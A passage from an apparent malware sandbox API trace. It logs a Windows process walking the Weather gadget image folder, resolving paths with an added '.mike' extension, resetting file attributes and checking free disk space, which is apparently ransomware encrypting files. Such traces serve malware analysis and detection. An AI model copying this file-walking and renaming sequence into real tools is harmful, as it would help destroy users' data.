(x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\undocked_black_few-showers.png.mike", nBufferLength=0x105, lpBuffer=0x2aec8c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\undocked_black_few-showers.png.mike", lpFilePart=0x0) returned 0x68 [0135.121] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\undocked_black_few-showers.png", dwFileAttributes=0x80) returned 0 [0135.122] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\undocked_black_few-showers.png.mike", nBufferLength=0x105, lpBuffer=0x2aebc8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\undocked_black_few-showers.png.mike", lpFilePart=0x0) returned 0x68 [0135.122] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\undocked_black_few-showers.png.mike", nBufferLength=0x105, lpBuffer=0x2aebd0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\undocked_black_few-showers.png.mike", lpFilePart=0x0) returned 0x68 [0135.125] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0135.125] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\undocked_black_foggy.png.mike", nBufferLength=0x105, lpBuffer=0x2aec90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\undocked_black_foggy.png.mike", lpFilePart=0x0) returned 0x62 [0135.125] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\undocked_black_foggy.png", nBufferLength=0x105, lpBuffer=0x2aebf4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\undocked_black_foggy.png", lpFilePart=0x0) returned 0x5d [0135.134] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\undocked_black_foggy.png.mike", nBufferLength=0x105, lpBuffer=0x2aec90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\undocked_black_foggy.png.mike", lpFilePart=0x0) returned 0x62 [0135.134] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\undocked_black_foggy.png", dwFileAttributes=0x80) returned 0 [0135.138] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0135.144] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\undocked_black_hail.png", dwFileAttributes=0x80) returned 0 [0135.148] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0135.154] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\undocked_black_moon-first-quarter.png", dwFileAttributes=0x80) returned 0 [0135.157] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0135.163] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\undocked_black_moon-first-quarter_partly-cloudy.png", dwFileAttributes=0x80) returned 0 [0135.167] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0135.173] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\undocked_black_moon-full.png", dwFileAttributes=0x80) returned 0 [0135.176] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0135.183] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\undocked_black_moon-full_partly-cloudy.png", dwFileAttributes=0x80) returned 0 [0135.186] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0135.192] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\undocked_black_moon-last-quarter.png", dwFileAttributes=0x80) returned 0 [0135.196] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0135.202] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\undocked_black_moon-last-quarter_partly-cloudy.png", dwFileAttributes=0x80) returned 0 [0135.206] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0135.214] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\undocked_black_moon-new.png", dwFileAttributes=0x80) returned 0 [0135.217] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0135.225] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\undocked_black_moon-new_partly-cloudy.png", dwFileAttributes=0x80) returned 0 [0135.228] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0135.235] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\undocked_black_moon-waning-crescent.png", dwFileAttributes=0x80) returned 0 [0135.238] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0135.245] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\undocked_black_moon-waning-crescent_partly-cloudy.png", dwFileAttributes=0x80) returned 0 [0135.249] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0135.256] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\undocked_black_moon-waning-gibbous.png", dwFileAttributes=0x80) returned 0 [0135.259] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0135.266] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\undocked_black_moon-waning-gibbous_partly-cloudy.png", dwFileAttributes=0x80) returned 0 [0135.269] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0135.275] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\undocked_black_moon-waxing-crescent.png", dwFileAttributes=0x80) returned 0 [0135.278] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0135.286] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\undocked_black_moon-waxing-crescent_partly-cloudy.png", dwFileAttributes=0x80) returned 0 [0135.289] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0135.295] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\undocked_black_moon-waxing-gibbous.png", dwFileAttributes=0x80) returned 0 [0135.298] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0135.305] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\undocked_black_moon-waxing-gibbous_partly-cloudy.png", dwFileAttributes=0x80) returned 0 [0135.308] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0135.314] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\undocked_black_rainy.png", dwFileAttributes=0x80) returned 0 [0135.317] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0135.324] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\undocked_black_snow.png", dwFileAttributes=0x80) returned 0 [0135.327] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0135.334] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\undocked_black_thunderstorm.png", dwFileAttributes=0x80) returned 0 [0135.336] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0135.343] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\undocked_black_windy.png", dwFileAttributes=0x80) returned 0 [0135.345] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0135.352] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\undocked_blue_partly-cloudy.png", dwFileAttributes=0x80) returned 0 [0135.354] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0135.361] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\undocked_blue_snow.png", dwFileAttributes=0x80) returned 0 [0135.363] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0135.370] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\undocked_blue_sun.png", dwFileAttributes=0x80) returned 0 [0135.372] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0135.380] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\undocked_blue_windy.png", dwFileAttributes=0x80) returned 0 [0135.382] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0135.389] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\undocked_gray_cloudy.png", dwFileAttributes=0x80) returned 0 [0135.391] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0135.398] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\undocked_gray_few-showers.png", dwFileAttributes=0x80) returned 0 [0135.400] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0135.407] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\undocked_gray_foggy.png", dwFileAttributes=0x80) returned 0 [0135.410] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0135.418] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\undocked_gray_hail.png", dwFileAttributes=0x80) returned 0 [0135.421] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0135.428] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\undocked_gray_rainy.png", dwFileAttributes=0x80) returned 0 [0135.431] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0135.446] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\undocked_gray_snow.png", dwFileAttributes=0x80) returned 0 [0135.448] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0135.455] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\undocked_gray_thunderstorm.png", dwFileAttributes=0x80) returned 0 [0135.457] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8012b5d2, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1a06bb00, ftLastAccessTime.dwHighDateTime=0x1d57a87, ftLastWriteTime.dwLowDateTime=0x1a06bb00, ftLastWriteTime.dwHighDateTime=0x1d57a87, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0135.458] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbd699b5c, ftCreationTime.dwHighDateTime=0x1c9ea13, ftLastAccessTime.dwLowDateTime=0xbd699b5c, ftLastAccessTime.dwHighDateTime=0x1c9ea13, ftLastWriteTime.dwLowDateTime=0xbd699b5c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x1456, dwReserved0=0x0, dwReserved1=0x0, cFileName="1.png", cAlternateFileName="")) returned 1 [0135.458] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbc00d2b2, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xbc00d2b2, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xbd699b5c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x1551, dwReserved0=0x0, dwReserved1=0x0, cFileName="10.png", cAlternateFileName="")) returned 1 [0135.458] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbc00d2b2, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xbc00d2b2, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xbd6bfcbc, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x1551, dwReserved0=0x0, dwReserved1=0x0, cFileName="11.png", cAlternateFileName="")) returned 1 [0135.458] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbc033411, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xbc033411, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xbd6bfcbc, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x1551, dwReserved0=0x0, dwReserved1=0x0, cFileName="12.png", cAlternateFileName="")) returned 1 [0135.459] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8012b5d2, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x818acf3e, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x818acf3e, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="120DPI", cAlternateFileName="")) returned 1 [0135.459] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbc033411, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xbc033411, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xbd6bfcbc, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0xfe2, dwReserved0=0x0, dwReserved1=0x0, cFileName="13.png", cAlternateFileName="")) returned 1 [0135.459] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbc07f6cf, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xbc07f6cf, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xbd6e5e1c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0xfe2, dwReserved0=0x0, dwReserved1=0x0, cFileName="14.png", cAlternateFileName="")) returned 1 [0135.460] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8012b5d2, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x81886ddd, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x81886ddd, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="144DPI", cAlternateFileName="")) returned 1 [0135.460] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbc0a582e, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xbc0a582e, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xbd6e5e1c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0xfe2, dwReserved0=0x0, dwReserved1=0x0, cFileName="15.png", cAlternateFileName="")) returned 1 [0135.460] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbc0a582e, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xbc0a582e, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xbd6e5e1c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0xfe2, dwReserved0=0x0, dwReserved1=0x0, cFileName="16.png", cAlternateFileName="")) returned 1 [0135.460] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbc0cb98d, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xbc0cb98d, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xbd70bf7c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x1c0e, dwReserved0=0x0, dwReserved1=0x0, cFileName="17.png", cAlternateFileName="")) returned 1 [0135.461] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbc0cb98d, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xbc0cb98d, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xbd70bf7c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x1c0e, dwReserved0=0x0, dwReserved1=0x0, cFileName="18.png", cAlternateFileName="")) returned 1 [0135.461] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbc0f1aec, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xbc0f1aec, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xbd70bf7c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x17b9, dwReserved0=0x0, dwReserved1=0x0, cFileName="19.png", cAlternateFileName="")) returned 1 [0135.461] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc 